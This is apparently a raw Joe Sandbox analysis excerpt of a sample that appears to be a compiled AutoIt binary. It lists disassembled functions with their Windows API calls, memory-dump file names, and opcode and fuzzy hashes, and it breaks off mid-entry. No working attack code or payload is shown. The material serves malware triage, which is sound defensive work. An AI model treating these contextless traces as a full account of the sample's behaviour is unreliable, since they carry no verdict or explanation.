                                                                            Function 002907BB Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 002907EC
                                                                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 002907F4
                                                                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 002907FF
                                                                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 0029080A
                                                                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 00290812
                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0029081A
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Virtual
                                                                            • String ID:
                                                                            • API String ID: 4278518827-0
                                                                            • Opcode ID: 95d13b2af2a306978382bd1fbd6acf48a8bc1f5b89ca0e6e06cf0b0fc400cfac
                                                                            • Instruction ID: e28d74319833789270e1691b564e48e525ba41fd78fe0b4273cd576c76292be5
                                                                            • Opcode Fuzzy Hash: 95d13b2af2a306978382bd1fbd6acf48a8bc1f5b89ca0e6e06cf0b0fc400cfac
                                                                            • Instruction Fuzzy Hash: 55016CB09027597DE3008F5A8C85B52FFA8FF59354F00411BA15C47941C7F5A864CBE5
                                                                            Function 002D59A4 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 002D59B4
                                                                            • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 002D59CA
                                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 002D59D9
                                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 002D59E8
                                                                            • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 002D59F2
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 002D59F9
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                            • String ID:
                                                                            • API String ID: 839392675-0
                                                                            • Opcode ID: 61cc5bfd4a5eb2a78597b5d52d67852d6374070b1b256ac123d8d7bd4b0bcc58
                                                                            • Instruction ID: 8d3d56aa0e3fdcb9c4c7eab86e9343c32736ba84f19b0a4c2ef17c3e66a81ff4
                                                                            • Opcode Fuzzy Hash: 61cc5bfd4a5eb2a78597b5d52d67852d6374070b1b256ac123d8d7bd4b0bcc58
                                                                            • Instruction Fuzzy Hash: 26F03036242158BBE7265B929C1DFEF7B7CEFC6B11F00015AFA0591050DBB11A1186B5
                                                                            Function 002D77EB Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InterlockedExchange.KERNEL32(?,?), ref: 002D77FE
                                                                            • EnterCriticalSection.KERNEL32(?,?,0027C2B6,?,?), ref: 002D780F
                                                                            • TerminateThread.KERNEL32(00000000,000001F6,?,0027C2B6,?,?), ref: 002D781C
                                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8,?,0027C2B6,?,?), ref: 002D7829
                                                                              • Part of subcall function 002D71F0: CloseHandle.KERNEL32(00000000,?,002D7836,?,0027C2B6,?,?), ref: 002D71FA
                                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 002D783C
                                                                            • LeaveCriticalSection.KERNEL32(?,?,0027C2B6,?,?), ref: 002D7843
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                            • String ID:
                                                                            • API String ID: 3495660284-0
                                                                            • Opcode ID: 3b24d6a46b90f19dfe62ac55a80d546cc6411c8ba86bcb599c90f7b31153c9b3
                                                                            • Instruction ID: e52542222458fd542860b8c353b8c19e3afdcf24f11cf4f8133f90f91e987f7a
                                                                            • Opcode Fuzzy Hash: 3b24d6a46b90f19dfe62ac55a80d546cc6411c8ba86bcb599c90f7b31153c9b3
                                                                            • Instruction Fuzzy Hash: 33F05836146212ABD71B2B64EC9CBAF773EFF49302F141823F202A51A0DBB95811DB60
                                                                            Function 002C954A Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 002C9555
                                                                            • UnloadUserProfile.USERENV(?,?), ref: 002C9561
                                                                            • CloseHandle.KERNEL32(?), ref: 002C956A
                                                                            • CloseHandle.KERNEL32(?), ref: 002C9572
                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 002C957B
                                                                            • HeapFree.KERNEL32(00000000), ref: 002C9582
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                            • String ID:
                                                                            • API String ID: 146765662-0
                                                                            • Opcode ID: c798d2761b1fc9ecb1361d493a4bbfe3bde4302178b8ecc8441c5473b86a3efe
                                                                            • Instruction ID: c3c7b92ab5ded24ed848fdb987aa28b65ea8eb12cceaab77713e5d6ce9ecf93d
                                                                            • Opcode Fuzzy Hash: c798d2761b1fc9ecb1361d493a4bbfe3bde4302178b8ecc8441c5473b86a3efe
                                                                            • Instruction Fuzzy Hash: 16E0E53A005101BBDB0B1FE1EC1CA5ABF3DFF49722F104222F21981070CB32A460DB90
                                                                            Function 002E8CD7 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VariantInit.OLEAUT32(?), ref: 002E8CFD
                                                                            • CharUpperBuffW.USER32(?,?), ref: 002E8E0C
                                                                            • VariantClear.OLEAUT32(?), ref: 002E8F84
                                                                              • Part of subcall function 002D7B1D: VariantInit.OLEAUT32(00000000), ref: 002D7B5D
                                                                              • Part of subcall function 002D7B1D: VariantCopy.OLEAUT32(00000000,?), ref: 002D7B66
                                                                              • Part of subcall function 002D7B1D: VariantClear.OLEAUT32(00000000), ref: 002D7B72
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                            • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                            • API String ID: 4237274167-1221869570
                                                                            • Opcode ID: 566e21058e6b6c4eb11884fd3318852a038ae6c6890a4087844fd11b252eca11
                                                                            • Instruction ID: 56adbbcdb6b7083e1f5a347fb6da6175f17004284733f0eb7040fe62cc25abdd
                                                                            • Opcode Fuzzy Hash: 566e21058e6b6c4eb11884fd3318852a038ae6c6890a4087844fd11b252eca11
                                                                            • Instruction Fuzzy Hash: 80919C746283419FC710EF25C48095ABBF5EF89314F44896EF88A8B3A2DB31E915CF52
                                                                            Function 002D323D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0028436A: _wcscpy.LIBCMT ref: 0028438D
                                                                            • _memset.LIBCMT ref: 002D332E
                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 002D335D
                                                                            • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 002D3410
                                                                            • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 002D343E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                            • String ID: 0
                                                                            • API String ID: 4152858687-4108050209
                                                                            • Opcode ID: fef1be2c983232d5d7f363175d6be66769c537deeee98ad9d6e81fcec6a14202
                                                                            • Instruction ID: 5736542523d247667b8eb5e1f5dd7ac19b72fb332794e9166302ffab65e7fb4b
                                                                            • Opcode Fuzzy Hash: fef1be2c983232d5d7f363175d6be66769c537deeee98ad9d6e81fcec6a14202
                                                                            • Instruction Fuzzy Hash: 7751EE716283029BD726EF28D94566BB7E8AB45320F04062FF891D22D1DB74CE64CB93
                                                                            Function 002D2EFA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 002D2F67
                                                                            • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 002D2F83
                                                                            • DeleteMenu.USER32(?,00000007,00000000), ref: 002D2FC9
                                                                            • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00337890,00000000), ref: 002D3012
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Delete$InfoItem_memset
                                                                            • String ID: 0
                                                                            • API String ID: 1173514356-4108050209
                                                                            • Opcode ID: e0405635d266e3b23d01962a64a296b8889e6d0a099350d92346cfb6584823db
                                                                            • Instruction ID: ba7e53e864dbca72f2b4694c5f36e0bd5d44739f39c63ffd6c40c1b8efe9ed8f
                                                                            • Opcode Fuzzy Hash: e0405635d266e3b23d01962a64a296b8889e6d0a099350d92346cfb6584823db
                                                                            • Instruction Fuzzy Hash: CC419F312293429FD724DF24C884B1ABBE8AB85310F144A1FF5A5973D1D770EE29CB52
                                                                            Function 002C9A48 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00281A36: _memmove.LIBCMT ref: 00281A77
                                                                              • Part of subcall function 002CB79A: GetClassNameW.USER32(?,?,000000FF), ref: 002CB7BD
                                                                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 002C9ACC
                                                                            • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 002C9ADF
                                                                            • SendMessageW.USER32(?,00000189,?,00000000), ref: 002C9B0F
                                                                              • Part of subcall function 00281821: _memmove.LIBCMT ref: 0028185B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$_memmove$ClassName
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 365058703-1403004172
                                                                            • Opcode ID: 9dcaa80ab98c900c19f00a609bb2b565304a041d46820d03a65b88fdf918a2d5
                                                                            • Instruction ID: 534228935545881cb9b0ac771abc95c8fdecb8951783cf368f71b41eec0c13e2
                                                                            • Opcode Fuzzy Hash: 9dcaa80ab98c900c19f00a609bb2b565304a041d46820d03a65b88fdf918a2d5
                                                                            • Instruction Fuzzy Hash: 3A21F2759621047FDB19EBA0DC8AEFEB76CDF45350F10421AF825932D0DB354D6A8B20
                                                                            Function 002F6A0C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00272111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0027214F
                                                                              • Part of subcall function 00272111: GetStockObject.GDI32(00000011), ref: 00272163
                                                                              • Part of subcall function 00272111: SendMessageW.USER32(00000000,00000030,00000000), ref: 0027216D
                                                                            • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 002F6A86
                                                                            • LoadLibraryW.KERNEL32(?), ref: 002F6A8D
                                                                            • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 002F6AA2
                                                                            • DestroyWindow.USER32(?), ref: 002F6AAA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                            • String ID: SysAnimate32
                                                                            • API String ID: 4146253029-1011021900
                                                                            • Opcode ID: 6f055af7c79f2a08b209b374b21ebebbeb5d995d6b24c99ca0681a0bf4b304ef
                                                                            • Instruction ID: 7b136e29320222ddd3d0f4e73b123a117a1a57d17c95c7b42764cb4e196d9312
                                                                            • Opcode Fuzzy Hash: 6f055af7c79f2a08b209b374b21ebebbeb5d995d6b24c99ca0681a0bf4b304ef
                                                                            • Instruction Fuzzy Hash: 9821A77112010AAFEF118F64DC89EBBB7ADEF553A4F108629FB50A2190D371DC619760
                                                                            Function 002D7357 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetStdHandle.KERNEL32(0000000C), ref: 002D7377
                                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 002D73AA
                                                                            • GetStdHandle.KERNEL32(0000000C), ref: 002D73BC
                                                                            • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 002D73F6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: CreateHandle$FilePipe
                                                                            • String ID: nul
                                                                            • API String ID: 4209266947-2873401336
                                                                            • Opcode ID: 0f785c51640fc13bde6fa62931be017b5d5bc898316a63dc7d144996a944f78e
                                                                            • Instruction ID: 23640ba79cf6dcbb768bdd65a3a1bf1823516ef8ed00359e26ec0831c1d5bd80
                                                                            • Opcode Fuzzy Hash: 0f785c51640fc13bde6fa62931be017b5d5bc898316a63dc7d144996a944f78e
                                                                            • Instruction Fuzzy Hash: 5F219270518307ABDB209F69DC45A9A7BA8AF54720F204A5BFCA0D73D0E774DC60DB50
                                                                            Function 002D7425 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetStdHandle.KERNEL32(000000F6), ref: 002D7444
                                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 002D7476
                                                                            • GetStdHandle.KERNEL32(000000F6), ref: 002D7487
                                                                            • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 002D74C1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: CreateHandle$FilePipe
                                                                            • String ID: nul
                                                                            • API String ID: 4209266947-2873401336
                                                                            • Opcode ID: 44973a080dbd80e4af218172f70e885ff7e3603b6754c8e33c97a7815e63ae85
                                                                            • Instruction ID: c32aead60ae007c53e918d57fd69b2801825947f7dc575c73c0000812e6f9ce5
                                                                            • Opcode Fuzzy Hash: 44973a080dbd80e4af218172f70e885ff7e3603b6754c8e33c97a7815e63ae85
                                                                            • Instruction Fuzzy Hash: 7721A1316183069BDB219F689C49E9A7BB8AF55730F204B1AFDA0D73D0EB749C60CB50
                                                                            Function 002DB283 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000001), ref: 002DB297
                                                                            • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 002DB2EB
                                                                            • __swprintf.LIBCMT ref: 002DB304
                                                                            • SetErrorMode.KERNEL32(00000000,00000001,00000000,00300980), ref: 002DB342
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode$InformationVolume__swprintf
                                                                            • String ID: %lu
                                                                            • API String ID: 3164766367-685833217
                                                                            • Opcode ID: b9c20cbba79de29bf04d3a3a6d4282b99f794c8ee6f6be9aa49df88c2a0c73b0
                                                                            • Instruction ID: f5f4b83a08c52ae8547e3dc2a914ed5bbd6b8f5b8ab93c54c409aa8eca758878
                                                                            • Opcode Fuzzy Hash: b9c20cbba79de29bf04d3a3a6d4282b99f794c8ee6f6be9aa49df88c2a0c73b0
                                                                            • Instruction Fuzzy Hash: 32218E34A00108AFCB10EF64C885EAEB7B8EF89304F008069F809E7252DB31EE51CF61
                                                                            Function 002CAC05 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00281821: _memmove.LIBCMT ref: 0028185B
                                                                              • Part of subcall function 002CAA52: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 002CAA6F
                                                                              • Part of subcall function 002CAA52: GetWindowThreadProcessId.USER32(?,00000000), ref: 002CAA82
                                                                              • Part of subcall function 002CAA52: GetCurrentThreadId.KERNEL32 ref: 002CAA89
                                                                              • Part of subcall function 002CAA52: AttachThreadInput.USER32(00000000), ref: 002CAA90
                                                                            • GetFocus.USER32 ref: 002CAC2A
                                                                              • Part of subcall function 002CAA9B: GetParent.USER32(?), ref: 002CAAA9
                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 002CAC73
                                                                            • EnumChildWindows.USER32(?,002CACEB), ref: 002CAC9B
                                                                            • __swprintf.LIBCMT ref: 002CACB5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                                            • String ID: %s%d
                                                                            • API String ID: 1941087503-1110647743
                                                                            • Opcode ID: 9bf5c932f7586f7832eb63114c96c53a64f731eb3d07b5b7fc72060b1138dfad
                                                                            • Instruction ID: 556f89ad4ee796de03cb65a5f9f32864b780e074354b2d73a17c6ecdc400477b
                                                                            • Opcode Fuzzy Hash: 9bf5c932f7586f7832eb63114c96c53a64f731eb3d07b5b7fc72060b1138dfad
                                                                            • Instruction Fuzzy Hash: 1311DF74620209ABDF16BFA08D86FEA377CEB44704F00417AFE08AA182CB705965CF71
                                                                            Function 002D22E7 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CharUpperBuffW.USER32(?,?), ref: 002D2318
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharUpper
                                                                            • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                            • API String ID: 3964851224-769500911
                                                                            • Opcode ID: 5c8b352abf8ef204189e1e035ea23c8e7abb3724c0cf9fec1165dced8aae9cbe
                                                                            • Instruction ID: b7e95ba7e55b1823d59429974b960c23c7b4c6605c7cf7bacaaa4c8be741e2cf
